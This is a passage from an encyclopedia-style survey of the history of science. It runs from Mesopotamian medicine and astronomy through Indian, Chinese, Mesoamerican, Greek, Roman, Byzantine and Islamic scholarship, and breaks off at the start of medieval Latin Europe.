The ancientMesopotamianshad no distinction between "rational science" andmagic.[55][56][57]When a person became ill, doctors prescribed magical formulas to be recited as well as medicinal treatments.[55][56][57][54]The earliest medical prescriptions appear inSumerianduring theThird Dynasty of Ur(c.2112 BCE –c.2004 BCE).[58]The most extensiveBabylonianmedical text, however, is theDiagnostic Handbookwritten by theummânū, or chief scholar,Esagil-kin-apliofBorsippa,[59]during the reign of the Babylonian kingAdad-apla-iddina(1069–1046 BCE).[60]InEast Semiticcultures, the main medicinal authority was a kind of exorcist-healer known as anāšipu.[55][56][57]The profession was generally passed down from father to son and was held in extremely high regard.[55]Of less frequent recourse was another kind of healer known as anasu, who corresponds more closely to a modern physician and treated physical symptoms using primarilyfolk remediescomposed of various herbs, animal products, and minerals, as well as potions, enemas, and ointments orpoultices. These physicians, who could be either male or female, also dressed wounds, set limbs, and performed simple surgeries. The ancient Mesopotamians also practicedprophylaxisand took measures to prevent the spread of disease.[54]
InBabylonian astronomy, records of the motions of thestars,planets, and themoonare left on thousands ofclay tabletscreated byscribes. Even today, astronomical periods identified by Mesopotamian proto-scientists are still widely used inWestern calendarssuch as thesolar yearand thelunar month. Using this data, they developed mathematical methods to compute the changing length of daylight in the course of the year, predict the appearances and disappearances of the Moon and planets, and eclipses of the Sun and Moon. Only a few astronomers' names are known, such as that ofKidinnu, aChaldeanastronomer and mathematician. Kiddinu's value for the solar year is in use for today's calendars. Babylonian astronomy was "the first and highly successful attempt at giving a refined mathematical description of astronomical phenomena." According to the historian A. Aaboe, "all subsequent varieties of scientific astronomy, in the Hellenistic world, in India, in Islam, and in the West—if not indeed all subsequent endeavour in the exact sciences—depend upon Babylonian astronomy in decisive and fundamental ways."[61]
To theBabyloniansand otherNear Easterncultures, messages from the gods or omens were concealed in all natural phenomena that could be deciphered and interpreted by those who are adept.[2]Hence, it was believed that the gods could speak through all terrestrial objects (e.g., animal entrails, dreams, malformed births, or even the color of a dog urinating on a person) and celestial phenomena.[2]Moreover, Babylonian astrology was inseparable from Babylonian astronomy.
The MesopotamiancuneiformtabletPlimpton 322, dating to the 18th century BCE, records a number ofPythagorean triplets(3, 4, 5) and (5, 12, 13) ...,[62]hinting that the ancient Mesopotamians might have been aware of thePythagorean theoremover a millennium before Pythagoras.[63][64][65]
Mathematical achievements from Mesopotamia had some influence on the development of mathematics in India, and there were confirmed transmissions of mathematical ideas between India and China, which were bidirectional.[66]Nevertheless, the mathematical and scientific achievements in India and particularly in China occurred largely independently[67]from those of Europe and the confirmed early influences that these two civilizations had on the development of science in Europe in the pre-modern era were indirect, with Mesopotamia and later the Islamic World acting as intermediaries.[66]The arrival of modern science, which grew out of theScientific Revolution, in India and China and the greater Asian region in general can be traced to the scientific activities of Jesuit missionaries who were interested in studying the region'sfloraandfaunaduring the 16th to 17th century.[68]
The earliest traces of mathematical knowledge in the Indian subcontinent appear with theIndus Valley Civilisation(c.3300– c.1300 BCE). The people of this civilization made bricks whose dimensions were in the proportion 4:2:1, which is favorable for the stability of a brick structure.[69]They also tried to standardize measurement of length to a high degree of accuracy. They designed a ruler—theMohenjo-daro ruler—whose length of approximately 1.32 in (34 mm) was divided into ten equal parts. Bricks manufactured in ancient Mohenjo-daro often had dimensions that were integral multiples of this unit of length.[70]
TheBakhshali manuscriptcontains problems involvingarithmetic,algebraandgeometry, includingmensuration. The topics covered include fractions, square roots,arithmeticandgeometric progressions, solutions of simple equations,simultaneous linear equations,quadratic equationsandindeterminate equationsof the second degree.[71]In the 3rd century BCE,Pingalapresents thePingala-sutras, the earliest known treatise onSanskrit prosody.[72]He also presents a numerical system by adding one to the sum ofplace values.[73]Pingala's work also includes material related to theFibonacci numbers, calledmātrāmeru.[74]
Indian astronomer and mathematicianAryabhata(476–550), in hisAryabhatiya(499) introduced thesinefunction intrigonometryand the number 0. In 628,Brahmaguptasuggested thatgravitywas a force of attraction.[75][76]He also lucidly explained the use ofzeroas both a placeholder and adecimal digit, along with theHindu–Arabic numeral systemnow used universally throughout the world.Arabictranslations of the two astronomers' texts were soon available in theIslamic world, introducing what would becomeArabic numeralsto the Islamic world by the 9th century.[77][78]
Narayana Pandita(1340–1400[79]) was an Indianmathematician.Plofkerwrites that his texts were the most significant Sanskrit mathematics treatises after those ofBhaskara II, other than theKerala school.[80]: 52He wrote theGanita Kaumudi(lit. "Moonlight of mathematics") in 1356 about mathematical operations.[81]The work anticipated many developments incombinatorics.
Between the 14th and 16th centuries, theKerala school of astronomy and mathematicsmade significant advances in astronomy and especially mathematics, including fields such as trigonometry and analysis. In particular,Madhava of Sangamagramaled advancement inanalysisby providing the infinite and taylor series expansion of some trigonometric functions and pi approximation.[82]Parameshvara(1380–1460), presents a case of the Mean Value theorem in his commentaries onGovindasvāmiandBhāskara II.[83]TheYuktibhāṣāwas written byJyeshtadevain 1530.[84]
The first textual mention of astronomical concepts comes from theVedas, religious literature of India.[85]According to Sarma (2008): "One finds in theRigvedaintelligent speculations about the genesis of the universe from nonexistence, the configuration of the universe, thespherical self-supporting earth, and the year of 360 days divided into 12 equal parts of 30 days each with a periodical intercalary month.".[85]
The first 12 chapters of theSiddhanta Shiromani, written byBhāskarain the 12th century, cover topics such as: mean longitudes of the planets; true longitudes of the planets; the three problems of diurnal rotation; syzygies; lunar eclipses; solar eclipses; latitudes of the planets; risings and settings; the moon's crescent; conjunctions of the planets with each other; conjunctions of the planets with the fixed stars; and the patas of the sun and moon. The 13 chapters of the second part cover the nature of the sphere, as well as significant astronomical and trigonometric calculations based on it.
In theTantrasangrahatreatise,Nilakantha Somayaji's updated the Aryabhatan model for the interior planets, Mercury, and Venus and the equation that he specified for the center of these planets was more accurate than the ones in European or Islamic astronomy until the time ofJohannes Keplerin the 17th century.[86]Jai Singh IIofJaipurconstructed fiveobservatoriescalledJantar Mantarsin total, inNew Delhi,Jaipur,Ujjain,MathuraandVaranasi; they were completed between 1724 and 1735.[87]
Some of the earliest linguistic activities can be found inIron Age India(1st millennium BCE) with the analysis ofSanskritfor the purpose of the correct recitation and interpretation ofVedictexts. The most notable grammarian of Sanskrit wasPāṇini(c. 520–460 BCE), whose grammar formulates close to 4,000 rules for Sanskrit. Inherent in his analytic approach are the concepts of thephoneme, themorphemeand theroot. TheTolkāppiyamtext, composed in the early centuries of the common era,[88]is a comprehensive text on Tamil grammar, which includes sutras on orthography, phonology, etymology, morphology, semantics, prosody, sentence structure and the significance of context in language.
Findings fromNeolithicgraveyards in what is now Pakistan show evidence of proto-dentistry among an early farming culture.[89]The ancient textSuśrutasamhitāofSuśrutadescribes procedures on various forms of surgery, includingrhinoplasty, the repair of torn ear lobes, perineallithotomy, cataract surgery, and several other excisions and other surgical procedures.[90][91]TheCharaka SamhitaofCharakadescribes ancient theories on human body,etiology,symptomologyandtherapeuticsfor a wide range of diseases.[92]It also includes sections on the importance of diet, hygiene, prevention, medical education, and the teamwork of a physician, nurse and patient necessary for recovery to health.[93][94][95]
An ancient Indian treatise onstatecraft,economicpolicy andmilitary strategyby Kautilya[96]andViṣhṇugupta,[97]who are traditionally identified withChāṇakya(c. 350–283 BCE). In this treatise, the behaviors and relationships of the people, the King, the State, the Government Superintendents, Courtiers, Enemies, Invaders, and Corporations are analyzed and documented.Roger Boeschedescribes theArthaśāstraas "a book of political realism, a book analyzing how the political world does work and not very often stating how it ought to work, a book that frequently discloses to a king what calculating and sometimes brutal measures he must carry out to preserve the state and the common good."[98]
The development of Indian logic dates back to the Chandahsutra of Pingala andanviksikiof Medhatithi Gautama (c. 6th century BCE); theSanskrit grammarrules ofPāṇini(c. 5th century BCE); theVaisheshikaschool's analysis ofatomism(c. 6th century BCE to 2nd century BCE); the analysis ofinferencebyGotama(c. 6th century BCE to 2nd century CE), founder of theNyayaschool ofHindu philosophy; and thetetralemmaofNagarjuna(c. 2nd century CE).
Indianlogic stands as one of the three original traditions oflogic, alongside theGreekand theChinese logic. The Indian tradition continued to develop through early to modern times, in the form of theNavya-Nyāyaschool of logic.
In the 2nd century, theBuddhistphilosopherNagarjunarefined theCatuskotiform of logic. The Catuskoti is also often glossedTetralemma(Greek) which is the name for a largely comparable, but not equatable, 'four corner argument' within the tradition ofClassical logic.
Navya-Nyāya developed a sophisticated language and conceptual scheme that allowed it to raise, analyse, and solve problems in logic and epistemology. It systematised all the Nyāya concepts into four main categories: sense or perception (pratyakşa), inference (anumāna), comparison or similarity (upamāna), and testimony (sound or word; śabda).
From the earliest the Chinese used a positional decimal system on counting boards in order to calculate. To express 10, a single rod is placed in the second box from the right. The spoken language uses a similar system to English: e.g. four thousand two hundred and seven. No symbol was used for zero. By the 1st century BCE, negative numbers and decimal fractions were in use andThe Nine Chapters on the Mathematical Artincluded methods for extracting higher order roots byHorner's methodand solving linear equations and byPythagoras' theorem. Cubic equations were solved in theTang dynastyand solutions of equations of order higher than 3 appeared in print in 1245 CE byCh'in Chiu-shao.Pascal's trianglefor binomial coefficients was described around 1100 byJia Xian.[99]
Although the first attempts at an axiomatization of geometry appear in theMohistcanon in 330 BCE,Liu Huideveloped algebraic methods in geometry in the 3rd century CE and also calculatedpito 5 significant figures. In 480,Zu Chongzhiimproved this by discovering the ratio355113{\displaystyle {\tfrac {355}{113}}}which remained the most accurate value for 1200 years.
Astronomical observations from China constitute the longest continuous sequence from any civilization and include records of sunspots (112 records from 364 BCE), supernovas (1054), lunar and solar eclipses. By the 12th century, they could reasonably accurately make predictions of eclipses, but the knowledge of this was lost during the Ming dynasty, so that the JesuitMatteo Riccigained much favor in 1601 by his predictions.[101][incomplete short citation]By 635 Chinese astronomers had observed that the tails of comets always point away from the sun.
From antiquity, the Chinese used an equatorial system for describing the skies and a star map from 940 was drawn using a cylindrical (Mercator) projection. The use of anarmillary sphereis recorded from the 4th century BCE and a sphere permanently mounted in equatorial axis from 52 BCE. In 125 CEZhang Hengused water power to rotate the sphere in real time. This included rings for the meridian and ecliptic. By 1270 they had incorporated the principles of the Arabtorquetum.
In theSong Empire(960–1279) ofImperial China, Chinesescholar-officialsunearthed, studied, and cataloged ancient artifacts.
To better prepare for calamities, Zhang Heng invented aseismometerin 132 CE which provided instant alert to authorities in the capital Luoyang that an earthquake had occurred in a location indicated by a specificcardinal or ordinal direction.[102][103]Although no tremors could be felt in the capital when Zhang told the court that an earthquake had just occurred in the northwest, a message came soon afterwards that an earthquake had indeed struck 400 to 500 km (250 to 310 mi) northwest of Luoyang (in what is now modernGansu).[104]Zhang called his device the 'instrument for measuring the seasonal winds and the movements of the Earth' (Houfeng didong yi 候风地动仪), so-named because he and others thought that earthquakes were most likely caused by the enormous compression of trapped air.[105]
There are many notable contributors to early Chinese disciplines, inventions, and practices throughout the ages. One of the best examples would be the medieval Song ChineseShen Kuo(1031–1095), apolymathand statesman who was the first to describe themagnetic-needlecompassused fornavigation, discovered the concept oftrue north, improved the design of the astronomicalgnomon,armillary sphere, sight tube, andclepsydra, and described the use ofdrydocksto repair boats. After observing the natural process of the inundation ofsiltand the find ofmarinefossilsin theTaihang Mountains(hundreds of miles from the Pacific Ocean), Shen Kuo devised a theory of land formation, orgeomorphology. He also adopted a theory of gradualclimate changein regions over time, after observingpetrifiedbamboofound underground atYan'an, Shaanxi. If not for Shen Kuo's writing,[106]the architectural works ofYu Haowould be little known, along with the inventor ofmovable typeprinting,Bi Sheng(990–1051). Shen's contemporarySu Song(1020–1101) was also a brilliant polymath, an astronomer who created a celestial atlas of star maps, wrote a treatise related tobotany,zoology,mineralogy, andmetallurgy, and had erected a largeastronomicalclocktowerinKaifengcity in 1088. To operate the crowningarmillary sphere, his clocktower featured anescapementmechanism and the world's oldest known use of an endless power-transmittingchain drive.[107]
TheJesuit China missionsof the 16th and 17th centuries "learned to appreciate the scientific achievements of this ancient culture and made them known in Europe. Through their correspondence European scientists first learned about the Chinese science and culture."[108]Western academic thought on the history of Chinese technology and science was galvanized by the work ofJoseph Needhamand the Needham Research Institute. Among the technological accomplishments of China were, according to the British scholar Needham, thewater-poweredcelestial globe(Zhang Heng),[109]dry docks, slidingcalipers, the double-actionpiston pump,[109]theblast furnace,[110]the multi-tubeseed drill, thewheelbarrow,[110]thesuspension bridge,[110]thewinnowing machine,[109]gunpowder,[110]theraised-relief map, toilet paper,[110]the efficient harness,[109]along with contributions inlogic,astronomy,medicine, and other fields.
However, cultural factors prevented these Chinese achievements from developing into "modern science". According to Needham, it may have been the religious and philosophical framework of Chinese intellectuals which made them unable to accept the ideas of laws of nature:
It was not that there was no order in nature for the Chinese, but rather that it was not an order ordained by a rational personal being, and hence there was no conviction that rational personal beings would be able to spell out in their lesser earthly languages the divine code of laws which he had decreed aforetime. TheTaoists, indeed, would have scorned such an idea as being too naïve for the subtlety and complexity of the universe as they intuited it.[111]
During theMiddle Formative Period(c. 900 BCE – c. 300 BCE) ofPre-ColumbianMesoamerica, theZapotec civilization, heavily influenced by theOlmec civilization, established the first knownfull writing systemof the region (possibly predated bythe OlmecCascajal Block),[112]as well as the first known astronomicalcalendar in Mesoamerica.[113][114]Following a period of initial urban development in thePreclassical period, theClassicMaya civilization(c. 250 CE – c. 900 CE) built on the shared heritage of the Olmecs by developing the most sophisticated systems ofwriting,astronomy,calendrical science, andmathematicsamong Mesoamerican peoples.[113]The Maya developed apositional numeral systemwith abase of 20that included the use ofzerofor constructing their calendars.[115][116]Maya writing, which was developed by 200 BCE, widespread by 100 BCE, and rootedin Olmecand Zapotec scripts, contains easily discernible calendar dates in the form oflogographsrepresenting numbers, coefficients, and calendar periods amounting to 20 days and even 20 years for tracking social, religious, political, and economic events in 360-day years.[117]
The contributions of the Ancient Egyptians and Mesopotamians in the areas of astronomy, mathematics, and medicine had entered and shapedGreeknatural philosophyofclassical antiquity, whereby formal attempts were made to provide explanations of events in thephysical worldbased on natural causes.[2][3]Inquiries were also aimed at such practical goals such as establishing a reliable calendar or determining how to cure a variety of illnesses. The ancient people who were considered the firstscientistsmay have thought of themselves asnatural philosophers, as practitioners of a skilled profession (for example,physicians), or as followers of areligious tradition(for example,temple healers).
The earliestGreek philosophers, known as thepre-Socratics,[118]provided competing answers to the question found in the myths of their neighbors: "How did the orderedcosmosin which we live come to be?"[119]The pre-Socratic philosopherThales(640–546 BCE) ofMiletus,[120]identified by later authors such as Aristotle as the first of theIonian philosophers,[2]postulated non-supernatural explanations for natural phenomena. For example, that land floats on water and that earthquakes are caused by the agitation of the water upon which the land floats, rather than the god Poseidon.[121]Thales' studentPythagorasofSamosfounded thePythagorean school, which investigated mathematics for its own sake, and was the first to postulate that the Earth is spherical in shape.[122]Leucippus(5th century BCE) introducedatomism, the theory that allmatteris made of indivisible, imperishable units calledatoms. This was greatly expanded on by his pupilDemocritusand laterEpicurus.
PlatoandAristotleproduced the first systematic discussions of natural philosophy, which did much to shape later investigations of nature. Their development ofdeductive reasoningwas of particular importance and usefulness to later scientific inquiry. Plato founded thePlatonic Academyin 387 BCE, whose motto was "Let none unversed in geometry enter here," and also turned out many notable philosophers. Plato's student Aristotle introducedempiricismand the notion that universal truths can be arrived at via observation and induction, thereby laying the foundations of the scientific method.[123]Aristotle also producedmany biological writingsthat were empirical in nature, focusing on biological causation and the diversity of life. He made countless observations of nature, especially the habits and attributes of plants and animals onLesbos, classified more than 540 animal species, and dissected at least 50.[124]Aristotle's writings profoundly influenced subsequentIslamicandEuropeanscholarship, though they were eventually superseded in theScientific Revolution.[125][126]
Aristotle also contributed to theories of the elements and the cosmos. He believed that thecelestial bodies(such as the planets and the Sun) had something called anunmoved moverthat put the celestial bodies in motion. Aristotle tried to explain everything through mathematics and physics, but sometimes explained things such as the motion of celestial bodies through a higher power such as God. Aristotle did not have the technological advancements that would have explained the motion of celestial bodies.[127]In addition, Aristotle had many views on the elements. He believed that everything was derived of the elements earth, water, air, fire, and lastly theAether. The Aether was a celestial element, and therefore made up the matter of the celestial bodies.[128]The elements of earth, water, air and fire were derived of a combination of two of the characteristics of hot, wet, cold, and dry, and all had their inevitable place and motion. The motion of these elements begins with earth being the closest to "the Earth," then water, air, fire, and finally Aether. In addition to the makeup of all things, Aristotle came up with theories as to why things did not return to their natural motion. He understood that water sits above earth, air above water, and fire above air in their natural state. He explained that although all elements must return to their natural state, the human body and other living things have a constraint on the elements – thus not allowing the elements making one who they are to return to their natural state.[129]
The important legacy of this period included substantial advances in factual knowledge, especially inanatomy,zoology,botany,mineralogy,geography,mathematicsandastronomy; an awareness of the importance of certain scientific problems, especially those related to the problem of change and its causes; and a recognition of the methodological importance of applying mathematics to natural phenomena and of undertaking empirical research.[130][120]In theHellenistic agescholars frequently employed the principles developed in earlier Greek thought: the application of mathematics and deliberate empirical research, in their scientific investigations.[131]Thus, clear unbroken lines of influence lead from ancientGreekandHellenistic philosophers, to medievalMuslim philosophersandscientists, to the EuropeanRenaissanceandEnlightenment, to the secularsciencesof the modern day.
Neither reason nor inquiry began with the Ancient Greeks, but theSocratic methoddid, along with the idea ofForms, give great advances in geometry,logic, and the natural sciences. According toBenjamin Farrington, former professor ofClassicsatSwansea University:
and again:
The astronomerAristarchus of Samoswas the first known person to propose a heliocentric model of theSolar System, while the geographerEratosthenesaccurately calculated the circumference of the Earth.Hipparchus(c. 190 – c. 120 BCE) produced the first systematicstar catalog. The level of achievement in Hellenistic astronomy andengineeringis impressively shown by theAntikythera mechanism(150–100 BCE), ananalog computerfor calculating the position of planets. Technological artifacts of similar complexity did not reappear until the 14th century, when mechanicalastronomical clocksappeared in Europe.[133]
There was not a defined societal structure for healthcare during the age of Hippocrates.[134]At that time, society was not organized and knowledgeable as people still relied on pure religious reasoning to explain illnesses.[134]Hippocrates introduced the first healthcare system based on science and clinical protocols.[135]Hippocrates' theories about physics and medicine helped pave the way in creating an organized medical structure for society.[135]Inmedicine,Hippocrates(c. 460–370 BCE) and his followers were the first to describe many diseases and medical conditions and developed theHippocratic Oathfor physicians, still relevant and in use today. Hippocrates' ideas are expressed inThe Hippocratic Corpus. The collection notes descriptions of medical philosophies and how disease and lifestyle choices reflect on the physical body.[135]Hippocrates influenced a Westernized, professional relationship among physician and patient.[136]Hippocratesis also known as "the Father of Medicine".[135]Herophilos(335–280 BCE) was the first to base his conclusions on dissection of the human body and to describe thenervous system.Galen(129 – c. 200 CE) performed many audacious operations—including brain and eyesurgeries— that were not tried again for almost two millennia.
InHellenistic Egypt, the mathematicianEuclidlaid down the foundations ofmathematical rigorand introduced the concepts of definition, axiom, theorem and proof still in use today in hisElements, considered the most influential textbook ever written.[138]Archimedes, considered one of the greatest mathematicians of all time,[139]is credited with using themethod of exhaustionto calculate theareaunder the arc of aparabolawith thesummation of an infinite series, and gave a remarkably accurate approximation ofpi.[140]He is also known in physics for laying the foundations ofhydrostatics,statics, and the explanation of the principle of thelever.
Theophrastuswrote some of the earliest descriptions of plants and animals, establishing the firsttaxonomyand looking at minerals in terms of their properties, such ashardness.Pliny the Elderproduced one of the largestencyclopediasof the natural world in 77 CE, and was a successor to Theophrastus. For example, he accurately describes theoctahedralshape of thediamondand noted that diamond dust is used byengraversto cut and polish other gems owing to its great hardness. His recognition of the importance ofcrystalshape is a precursor to moderncrystallography, while notes on other minerals presages mineralogy. He recognizes other minerals have characteristic crystal shapes, but in one example, confuses thecrystal habitwith the work oflapidaries. Pliny was the first to showamberwas a resin from pine trees, because of trapped insects within them.[141][142]
The development of archaeology has its roots in history and with those who were interested in the past, such as kings and queens who wanted to show past glories of their respective nations. The 5th-century-BCEGreek historianHerodotuswas the first scholar to systematically study the past and perhaps the first to examine artifacts.
During the rule of Rome, famous historians such asPolybius,LivyandPlutarchdocumented the rise of theRoman Republic, and the organization and histories of other nations, while statesmen likeJulius Caesar, Cicero, and others provided examples of the politics of the republic and Rome's empire and wars. The study of politics during this age was oriented toward understanding history, understanding methods of governing, and describing the operation of governments.
TheRoman conquest of Greecedid not diminish learning and culture in the Greek provinces.[143]On the contrary, the appreciation of Greek achievements in literature, philosophy, politics, and the arts by Rome'supper classcoincided with the increased prosperity of theRoman Empire. Greek settlements had existed in Italy for centuries and the ability to read and speak Greek was not uncommon in Italian cities such as Rome.[143]Moreover, the settlement of Greek scholars in Rome, whether voluntarily or as slaves, gave Romans access to teachers of Greek literature and philosophy. Conversely, young Roman scholars also studied abroad in Greece and upon their return to Rome, were able to convey Greek achievements to their Latin leadership.[143]And despite the translation of a few Greek texts into Latin, Roman scholars who aspired to the highest level did so using the Greek language. The Romanstatesmanand philosopherCicero(106 – 43 BCE) was a prime example. He had studied under Greek teachers in Rome and then in Athens andRhodes. He mastered considerable portions of Greek philosophy, wrote Latin treatises on several topics, and even wrote Greek commentaries of Plato'sTimaeusas well as a Latin translation of it, which has not survived.[143]
In the beginning, support for scholarship in Greek knowledge was almost entirely funded by the Roman upper class.[143]There were all sorts of arrangements, ranging from a talented scholar being attached to a wealthy household to owning educated Greek-speaking slaves.[143]In exchange, scholars who succeeded at the highest level had an obligation to provide advice or intellectual companionship to their Roman benefactors, or to even take care of their libraries. The less fortunate or accomplished ones would teach their children or perform menial tasks.[143]The level of detail and sophistication of Greek knowledge was adjusted to suit the interests of their Roman patrons. That meant popularizing Greek knowledge by presenting information that were of practical value such as medicine or logic (for courts and politics) but excluding subtle details of Greek metaphysics and epistemology. Beyond the basics, the Romans did not value natural philosophy and considered it an amusement for leisure time.[143]
Commentaries andencyclopediaswere the means by which Greek knowledge was popularized for Roman audiences.[143]The Greek scholarPosidonius(c. 135-c. 51 BCE), a native of Syria, wrote prolifically on history, geography, moral philosophy, and natural philosophy. He greatly influenced Latin writers such asMarcus Terentius Varro(116-27 BCE), who wrote the encyclopediaNine Books of Disciplines, which covered nine arts: grammar, rhetoric, logic, arithmetic, geometry, astronomy, musical theory, medicine, and architecture.[143]TheDisciplinesbecame a model for subsequent Roman encyclopedias and Varro's nine liberal arts were considered suitable education for a Roman gentleman. The first seven of Varro's nine arts would later define theseven liberal artsofmedieval schools.[143]The pinnacle of the popularization movement was the Roman scholarPliny the Elder(23/24–79 CE), a native of northern Italy, who wrote several books on the history of Rome and grammar. His most famous work was his voluminousNatural History.[143]
After the death of the Roman EmperorMarcus Aureliusin 180 CE, the favorable conditions for scholarship and learning in the Roman Empire were upended by political unrest, civil war, urban decay, and looming economic crisis.[143]In around 250 CE,barbariansbegan attacking and invading the Roman frontiers. These combined events led to a general decline in political and economic conditions. The living standards of the Roman upper class was severely impacted, and their loss ofleisurediminished scholarly pursuits.[143]Moreover, during the 3rd and 4th centuries CE, the Roman Empire was administratively divided into two halves:Greek East and Latin West. These administrative divisions weakened the intellectual contact between the two regions.[143]Eventually, both halves went their separate ways, with the Greek East becoming theByzantine Empire.[143]Christianitywas also steadily expanding during this time and soon became a major patron of education in the Latin West. Initially, the Christian church adopted some of the reasoning tools of Greek philosophy in the 2nd and 3rd centuries CE to defend its faith against sophisticated opponents.[143]Nevertheless, Greek philosophy received a mixed reception from leaders and adherents of the Christian faith.[143]Some such asTertullian(c. 155-c. 230 CE) were vehemently opposed to philosophy, denouncing it asheretic. Others such asAugustine of Hippo(354-430 CE) were ambivalent and defended Greek philosophy and science as the best ways to understand the natural world and therefore treated it as ahandmaiden(or servant) of religion.[143]Education in the West began its gradual decline, along with the rest ofWestern Roman Empire, due to invasions by Germanic tribes, civil unrest, and economic collapse. Contact with the classical tradition was lost in specific regions such asRoman Britainand northernGaulbut continued to exist in Rome, northern Italy, southern Gaul, Spain, andNorth Africa.[143]
In the Middle Ages, the classical learning continued in three major linguistic cultures and civilizations: Greek (the Byzantine Empire), Arabic (the Islamic world), and Latin (Western Europe).
Thefall of the Western Roman Empireled to a deterioration of the classical tradition in the western part (orLatin West) of Europe during the 5th century. In contrast, the Byzantine Empire resisted the barbarian attacks and preserved and improved the learning.[144]
While the Byzantine Empire still held learning centers such asConstantinople, Alexandria and Antioch, Western Europe's knowledge was concentrated inmonasteriesuntil the development ofmedieval universitiesin the 12th centuries. The curriculum of monastic schools included the study of the few available ancient texts and of new works on practical subjects like medicine[145]and timekeeping.[146]
In the sixth century in the Byzantine Empire,Isidore of Miletuscompiled Archimedes' mathematical works in theArchimedes Palimpsest, where all Archimedes' mathematical contributions were collected and studied.
John Philoponus, another Byzantine scholar, was the first to question Aristotle's teaching of physics, introducing thetheory of impetus.[147][148]The theory of impetus was an auxiliary or secondary theory of Aristotelian dynamics, put forth initially to explain projectile motion against gravity. It is the intellectual precursor to the concepts of inertia, momentum and acceleration in classical mechanics.[149]The works of John Philoponus inspiredGalileo Galileiten centuries later.[150][151]
During theFall of Constantinoplein 1453, a number of Greek scholars fled to North Italy in which they fueled the era later commonly known as the "Renaissance" as they brought with them a great deal of classical learning including an understanding of botany, medicine, and zoology. Byzantium also gave the West important inputs: John Philoponus' criticism of Aristotelian physics, and the works of Dioscorides.[152]
This was the period (8th–14th century CE) of theIslamic Golden Agewhere commerce thrived, and new ideas and technologies emerged such as the importation ofpapermakingfrom China, which made the copying of manuscripts inexpensive.
The eastward transmission of Greek heritage to Western Asia was a slow and gradual process that spanned over a thousand years, beginning with the Asian conquests ofAlexander the Greatin 335 BCE to thefounding of Islam in the 7th century CE.[5]The birth and expansion of Islam during the 7th century was quickly followed by itsHellenization. Knowledge ofGreek conceptions of the worldwas preserved and absorbed into Islamic theology, law, culture, and commerce, which were aided by the translations of traditional Greek texts and someSyriacintermediary sources intoArabicduring the 8th–9th century.
Madrasaswere centers for many different religious and scientific studies and were the culmination of different institutions such as mosques based around religious studies, housing for out-of-town visitors, and finally educational institutions focused on the natural sciences.[153]Unlike Western universities, students at a madrasa would learn from one specific teacher, who would issue a certificate at the completion of their studies called anIjazah. An Ijazah differs from a western university degree in many ways one being that it is issued by a single person rather than an institution, and another being that it is not an individual degree declaring adequate knowledge over broad subjects, but rather a license to teach and pass on a very specific set of texts.[154]Women were also allowed to attend madrasas, as both students and teachers, something not seen in high western education until the 1800s.[154]Madrasas were more than just academic centers. TheSuleymaniye Mosque, for example, was one of the earliest and most well-known madrasas, which was built bySuleiman the Magnificentin the 16th century.[155]The Suleymaniye Mosque was home to a hospital and medical college, a kitchen, and children's school, as well as serving as a temporary home for travelers.[155]
Higher education at a madrasa (or college) was focused on Islamic law and religious science and students had to engage in self-study for everything else.[5]And despite the occasional theological backlash, many Islamic scholars of science were able to conduct their work in relatively tolerant urban centers (e.g.,BaghdadandCairo) and were protected by powerful patrons.[5]They could also travel freely and exchange ideas as there were no political barriers within the unified Islamic state.[5]Islamic science during this time was primarily focused on the correction, extension, articulation, and application of Greek ideas to new problems.[5]
Most of the achievements by Islamic scholars during this period were in mathematics.[5]Arabic mathematicswas a direct descendant of Greek and Indian mathematics.[5]For instance, what is now known asArabic numeralsoriginally came from India, but Muslim mathematicians made several key refinements to the number system, such as the introduction ofdecimal pointnotation. Mathematicians such asMuhammad ibn Musa al-Khwarizmi(c. 780–850) gave his name to the concept of thealgorithm, while the termalgebrais derived fromal-jabr, the beginning of the title of one of his publications.[156]Islamic trigonometry continued from the works of Ptolemy'sAlmagestand IndianSiddhanta, from which they addedtrigonometric functions, drew up tables, and applied trignometry to spheres and planes. Many of their engineers, instruments makers, and surveyors contributed books in applied mathematics. It was inastronomywhere Islamic mathematicians made their greatest contributions.Al-Battani(c. 858–929) improved the measurements ofHipparchus, preserved in the translation ofPtolemy'sHè Megalè Syntaxis(The great treatise) translated asAlmagest. Al-Battani also improved the precision of the measurement of the precession of the Earth's axis. Corrections were made to Ptolemy'sgeocentric modelby al-Battani,Ibn al-Haytham,[157]Averroesand theMaragha astronomerssuch asNasir al-Din al-Tusi,Mu'ayyad al-Din al-UrdiandIbn al-Shatir.[158][159]
Scholars with geometric skills made significant improvements to the earlier classical texts on light and sight by Euclid, Aristotle, and Ptolemy.[5]The earliest surviving Arabic treatises were written in the 9th century byAbū Ishāq al-Kindī,Qustā ibn Lūqā, and (in fragmentary form) Ahmad ibn Isā. Later in the 11th century,Ibn al-Haytham(known as Alhazen in the West), a mathematician and astronomer, synthesized a new theory of vision based on the works of his predecessors.[5]His new theory included a complete system of geometrical optics, which was set in great detail in hisBook of Optics.[5][160]His book was translated into Latin and was relied upon as a principal source on the science of optics in Europe until the 17th century.[5]
The medical sciences were prominently cultivated in the Islamic world.[5]The works of Greek medical theories, especially those of Galen, were translated into Arabic and there was an outpouring of medical texts by Islamic physicians, which were aimed at organizing, elaborating, and disseminating classical medical knowledge.[5]Medical specialtiesstarted to emerge, such as those involved in the treatment of eye diseases such ascataracts. Ibn Sina (known asAvicennain the West, c. 980–1037) was a prolific Persian medical encyclopedist[161]wrote extensively on medicine,[162][163]with his two most notable works in medicine being theKitāb al-shifāʾ("Book of Healing") andThe Canon of Medicine, both of which were used as standard medicinal texts in both the Muslim world and in Europe well into the 17th century. Amongst his many contributions are the discovery of the contagious nature of infectious diseases,[162]and the introduction of clinical pharmacology.[164]Institutionalization of medicine was another important achievement in the Islamic world. Although hospitals as an institution for the sick emerged in the Byzantium empire, the model of institutionalized medicine for all social classes was extensive in the Islamic empire and was scattered throughout. In addition to treating patients, physicians could teach apprentice physicians, as well write and do research. The discovery of the pulmonary transit of blood in the human body byIbn al-Nafisoccurred in a hospital setting.[5]
Islamic science began its decline in the 12th–13th century, before theRenaissancein Europe, due in part to theChristian reconquest of Spainand theMongol conquestsin the East in the 11th–13th century. The Mongolssacked Baghdad, capital of theAbbasid Caliphate, in 1258, which ended theAbbasid empire.[5][165]Nevertheless, many of the conquerors became patrons of the sciences.Hulagu Khan, for example, who led the siege of Baghdad, became a patron of theMaragheh observatory.[5]Islamic astronomy continued to flourish into the 16th century.[5]
By the eleventh century, most of Europe had become Christian; stronger monarchies emerged; borders were restored; technological developments and agricultural innovations were made, increasing the food supply and population. Classical Greek texts were translated from Arabic and Greek into Latin, stimulating scientific discussion in Western Europe.[166]
